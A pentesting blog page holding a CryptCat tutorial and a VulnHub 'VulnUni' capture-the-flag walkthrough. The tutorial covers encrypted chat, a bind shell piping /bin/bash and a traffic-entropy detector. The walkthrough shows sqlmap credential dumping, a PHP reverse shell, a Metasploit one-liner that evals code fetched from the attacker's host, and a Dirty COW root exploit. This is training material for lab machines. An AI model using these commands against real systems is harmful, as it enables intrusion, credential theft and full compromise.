Comprehensive Guide on CryptCat


In this article, we cover the basic functionality of CryptCat, from a simple encrypted chat to getting a shell through it, and compare what an eavesdropper sees with Netcat and with CryptCat.
Table of Contents:
·         Introduction
·         Chat
·         Verbose mode
·         Protect with Password
·         Reverse Shell
·         Randomize port
·         Timeout and Delay interval
·         Netcat vs CryptCat

Introduction
CryptCat is standard Netcat enhanced with two-way Twofish encryption. Like Netcat, it is a small Unix utility that reads and writes data across network connections over TCP or UDP, but CryptCat encrypts the data it transmits. It is a reliable back-end tool that is easily driven by other programs and scripts, and it doubles as a network debugging and exploration tool.
CryptCat can act as a TCP/UDP client (connecting out) or as a server (listening on a socket). It derives the encryption key from a password supplied with the [-k] parameter. If no password is given, it falls back to the hard-coded default password "metallica". That default is public, so a session that does not set its own key is, in practice, readable by anyone who captures it and knows the tool.
We can explore its working and usage by exploring its available options.
cryptcat -h


Chat
CryptCat can be used to chat between two users. A connection has to be established before the chat can start, so we need two systems: one acts as the listener and the other as the initiator. Once connected, either side can type and the other side sees it.
Here we set up a chat between two users on different operating systems.
User 1
OS: Kali Linux
IP Address: 192.168.0.107
Role: Listener
Start the listener on Kali Linux with the following command:

cryptcat -l -p 42



User 2
OS: Ubuntu
IP Address: 192.168.0.108
Role: Initiator
To create the initiator, we just give CryptCat the IP address of the system where the listener is running, followed by its port number:

cryptcat 192.168.0.107 42

Verbose mode
In CryptCat, verbose mode is enabled with the [-v] parameter. Verbose mode prints extra information about what the tool is doing. We repeat the chat above with [-v] added on both sides; CryptCat now reports the steps it performs while setting up the connection (the address it listens on, the connection it receives or makes, and so on).

At listener side
cryptcat -lvp 42

At Initiator side
cryptcat -v 192.168.0.107 42

Protect with password
In CryptCat, the password (encryption key) for a connection is set with the [-k] parameter. CryptCat always encrypts the stream, but without [-k] both sides use the default password "metallica", which is publicly known; so [-k] is not an extra layer on top of the encryption, it is what makes the encryption meaningful. Two caveats a practitioner should keep in mind: the key is passed on the command line, so it is visible to other local users in the process list and ends up in shell history, and CryptCat does not authenticate the peer, so anyone who knows the key can connect to the listener. We apply the password with the following commands.
At the listener side, we add the [-k] parameter with the password:
cryptcat -k ignite -lvp 42

At the initiator side, we must use the same password as the listener, otherwise the two ends cannot decrypt each other's data and the connection is useless:
cryptcat -v -k ignite 192.168.0.107 42

Reverse shell
A reverse shell is a shell in which the target machine connects back to the attacking machine. What is shown here is, strictly speaking, a bind shell: the listener runs on the target and the attacker connects to it, authenticating with the [-k] password. The same plumbing works the other way round (listener on the attacker, target connecting out with the same key) if you need a true reverse shell. Because CryptCat has no peer authentication, this listener hands a shell to anyone who can reach the port and knows the key, so use a strong key and tear the listener down when finished. On the target, create a named pipe, then start the listener so that whatever arrives on the socket is fed to /bin/bash and bash's output is sent back through the pipe:
mkfifo myfifo
cryptcat -k mysecret -l -p 3333 0<myfifo | /bin/bash 1>myfifo

Now, on the attacker side, we just connect to the victim with the same key. Once connected, we confirm that we have a shell and check which user it runs as with whoami, and identify the host with ip a:
cryptcat -k mysecret 192.168.0.107 3333
whoami
ip a

Randomize port
If we do not want to pick a port number ourselves when starting the listener, CryptCat has the [-r] parameter, which selects a random local port. In verbose mode the chosen port is printed, so the initiator knows where to connect:
cryptcat -lv -r

Timeout and Delay interval
These two options are easily confused. The timeout, set with [-w], is the number of seconds CryptCat waits for a connection to be established (and for the final network read) before giving up. The delay interval, set with [-i], is the pause inserted between individual lines sent (or, when scanning, between ports). We apply the two parameters as follows.
At the listener side, we set both the timeout and the delay interval:
cryptcat -v -w 30 -i 10 -l -p 8080
At the initiator side, we only set a timeout:
cryptcat -v -w 2 192.168.0.7 8080

Netcat vs Cryptcat
Before comparing the two, we need to know what Netcat (nc) is. It is a utility that reads and writes data across TCP and UDP connections, and it is used both by defenders and by attackers.
On the offensive side, it is easily scripted, which makes it a dependable building block. On the defensive side, it is handy for debugging and investigating network services. We have covered Netcat in detail in a previous article; to read it, click here.
CryptCat is a more advanced version of Netcat: it adds two-way encryption, which makes the connection harder to eavesdrop on. We compare the two tools on exactly that point, encryption of the chat connection, by capturing the traffic on the network interface with Wireshark.
Netcat: as before, we start a listener and an initiator for the chat, and at the same time we start Wireshark capturing on the network interface.

At the listener side we are using [-l] parameter for listening and [-p] parameter for port number.
nc -l -p 3131


At the Initiator side, we just need to provide a port number, along with the listeners IP Address.
nc 192.168.0.111 3131

Now we check whether Wireshark captured anything. As the capture shows, the chat was intercepted and every message is readable in clear text.


CryptCat: we already know that CryptCat provides two-way encryption, which should make the connection more secure than Netcat's. We verify this by capturing its chat traffic with Wireshark in the same way, again with a listener and an initiator.

At the Listener side, we will use the [-p] parameter for port and [-l] for initiating the listener.
cryptcat -l -p 3131



At the initiator side, we just need to provide IP Address along with listeners port number.
cryptcat 192.168.0.111 3131


Now we check the capture again. This time the chat payload is encrypted: Wireshark shows only unreadable bytes.


That is the main difference between Netcat and CryptCat: one encrypts the traffic and the other does not. Some people put it as CryptCat = encryption + Netcat.
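The Wireshark observation above can be automated. The following added example (not code from the original article or from the CryptCat project) applies the check a detection engineer would run over captured TCP payloads: Netcat chat is almost entirely printable text with low byte entropy, while a CryptCat session looks like random bytes. The sample segments, the IP addresses in their labels and the pseudo-ciphertext generator are all constructed for this example; the generator is a SHA-256 chain that only mimics a high-entropy stream and is not CryptCat's Twofish cipher.

```python
"""Classify captured TCP payloads as cleartext or encrypted/binary.

Added example, not part of the original article. It stands in for the
Wireshark "Follow TCP Stream" step: a netcat chat shows up as readable
text, a cryptcat session as high-entropy bytes. The segments below are
constructed for this example; they are not a real capture.
"""
import hashlib
import math
import string

# Bytes considered "printable": ASCII letters, digits, punctuation, whitespace.
PRINTABLE = set(string.printable.encode())


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0..8) of a byte string."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in PRINTABLE) / len(data)


def classify_payload(data: bytes) -> str:
    """Heuristic: chat text is almost all printable and has low entropy.
    Ciphertext is ~39% printable by chance and close to 8 bits/byte."""
    if printable_ratio(data) >= 0.9 and shannon_entropy(data) <= 5.0:
        return "cleartext"
    return "encrypted-or-binary"


def summarize_stream(segments):
    """segments: list of (direction, payload). Returns per-segment verdicts
    and a majority verdict for the whole stream."""
    verdicts = [(d, classify_payload(p)) for d, p in segments]
    n_clear = sum(1 for _, v in verdicts if v == "cleartext")
    overall = "cleartext" if n_clear > len(verdicts) / 2 else "encrypted-or-binary"
    return verdicts, overall


def _pseudo_ciphertext(label: bytes, nbytes: int) -> bytes:
    """Deterministic stand-in for an encrypted stream (SHA-256 chained).
    NOT cryptcat's cipher; it only produces high-entropy bytes for the demo."""
    out, block = b"", label
    while len(out) < nbytes:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:nbytes]


# Constructed samples (assumed addresses, not a real capture).
NETCAT_CHAT = [
    ("192.168.0.108->192.168.0.111", b"hello from the initiator\n"),
    ("192.168.0.111->192.168.0.108", b"hi, listener here\n"),
]
CRYPTCAT_CHAT = [
    ("192.168.0.108->192.168.0.111", _pseudo_ciphertext(b"segment-1", 64)),
    ("192.168.0.111->192.168.0.108", _pseudo_ciphertext(b"segment-2", 64)),
]

if __name__ == "__main__":
    for name, stream in (("netcat", NETCAT_CHAT), ("cryptcat", CRYPTCAT_CHAT)):
        verdicts, overall = summarize_stream(stream)
        print(f"{name}: stream verdict = {overall}")
        for direction, payload in stream:
            print(f"  {direction}: {classify_payload(payload)} "
                  f"entropy={shannon_entropy(payload):.2f} "
                  f"printable={printable_ratio(payload):.2f}")
```

The thresholds are deliberately simple. Short payloads cap the measurable entropy at log2(length), and compressed or binary protocol data is also high-entropy, so on real traffic this separates "readable chat" from "not readable" rather than "encrypted" from "not encrypted"; it is the same distinction a signature-based IDS relies on when it matches keywords in a cleartext Netcat session and finds nothing in a CryptCat one.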

Author: Shubham Sharma is a Pentester, Cybersecurity Researcher, Contact Linkedin and twitter.

VulnUni: 1.0.1: Vulnhub Walkthrough


Hello! Everyone and Welcome to yet another CTF challenge from emaragkos, called ‘VulnUni: 1.0.1,’ which is available online on vulnhub for those who want to increase their skills in penetration testing and Black box testing. You can download the lab from here.
Level: Easy
Task: Find user.txt and root.txt in the victim’s machine
Penetration Methodologies
·         Scanning
o   Netdiscover
o   Nmap
·         Enumeration
o   Browsing HTTP service
o   Extracting urls through burpsuite spider
·         Exploitation
o   Using sqlmap to exploit a SQL injection vulnerability
o   Extracting User information using sqlmap
·         Privilege Escalation
o   Uploading a PHP reverse shell
o   Using msfconsole web delivery to get a meterpreter session
o   Using Dirty COW against the vulnerable kernel
·         Capturing the flag

Walkthrough

Let’s get started and pwn this machine!

Scanning

To identify our target, we will use netdiscover and our target IP is 192.168.1.148 as shown in the image below:


Let’s proceed further with Nmap to scan our target IP in order to find open ports, if any. Use the following command to scan the IP:
nmap -A 192.168.1.148


And as the result shows, port 80 is open with the service of HTTP.

Enumeration

As we are enumerating further, we open the target IP in the browser. The webpage that we came across was about the university.

We couldn’t find anything useful here so we moved on and we started a Directory Bruteforce in order to enumerate the machine further. This gave us some directories and files namely contact, about, courses etc. But apart from this there wasn’t anything useful here.

Then we launched Burp Suite and captured the request to the URL in the Intercept tab, as shown in the following image.
Using Burp Suite's spider, we found many more URLs. Among these, the E-Class URL was opened. The application also disclosed its version, 1.7.2, which might be vulnerable and exploitable, so we noted it down for later use.

The directory e-class got us a login form. When tried to log in with default username and password, i.e. admin:admin, we successfully logged in.

But after logging in there was a Document Expired error and the URL was redirecting to Vulnuni.local as shown in the image below :

Therefore, we added the host to our /etc/hosts file just like in the image below :

Earlier, we found that the application was running version 1.7.2, which is outdated. Open-source intelligence showed that this version is affected by a known SQL injection flaw with a public exploit on Exploit-DB, as shown in the image below:

In order to use the exploit to our advantage, we needed to capture the request of the login page through burpsuite as shown in the image below :

After capturing the request, copy it into a text file and save it, as shown in the following image:


Now, with the help of sqlmap we will inject our malicious query, with the help of the following command:
sqlmap -r vulnuni --dbs --batch

Executing the above command revealed five databases in total, as shown in the image below. What we need now are credentials from one of them.
Since the e-class directory had already proved important, we went for the eclass database first and dumped the password column of its user table:
sqlmap -r vulnuni -D eclass -T user -C password --dump --batch

This gave us a few passwords, as shown below, which we tried one by one against the login form.
We were soon logged in: the working password is ilikecats89, as you can see in the image below:
While browsing the application as admin, we found a page that lets us upload a file, which we can abuse to upload a shell: http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php
To prepare the malicious file, we downloaded a PHP reverse shell, changed its IP and port to our own local host and local port, and uploaded a compressed (archive) version of it, since the restore function expects an archive. You can see this in the image below:
After uploading shell, we started the netcat listener by using the following command:
sudo nc -nvlp 443
Once, the shell file is executed, we have our shell through netcat, as shown in the image below :

Since a raw Netcat shell is not the most comfortable working environment, we used Metasploit's web_delivery module to turn our Netcat session into a meterpreter session, which gives us more options. In msfconsole, type:

use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.92
set payload php/meterpreter/reverse_tcp
set lport 80
exploit

Note: to get the meterpreter shell, we ran the one-liner generated by the module in the Netcat shell obtained above: php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.92/Oyd1Yv5lI'));"

Next we upgraded the shell to a fully interactive TTY shell, which is more convenient to work in, with the following command:
python -c 'import pty;pty.spawn("/bin/bash")'
After getting the TTY shell, we navigated through many directories and we found user flag in the home directory with the help of following commands:
cd /home
ls
cd vuluni
cat flag.txt

Privilege Escalation

We use the following command to get the kernel version of the target machine:
uname -r



OSINT on that kernel version showed that it is vulnerable to Dirty COW. We downloaded the exploit source to our attacking machine, saved it in /var/www/html and started the Apache server on port 80. Then, from the target's shell, we changed to the /tmp directory (writable by everyone, so a good place to drop and build the exploit) and fetched dirtycow.c from our web server:
cd /tmp
wget http://192.168.1.92/dirtycow.c

Now we compile the exploit's C source into an executable (the -o option names the output binary; -pthread is required because the exploit races two threads) and run it:

gcc dirtycow.c -o root -pthread
./root
cd /root
ls
cat flag.txt


And voila!! We have successfully rooted the lab.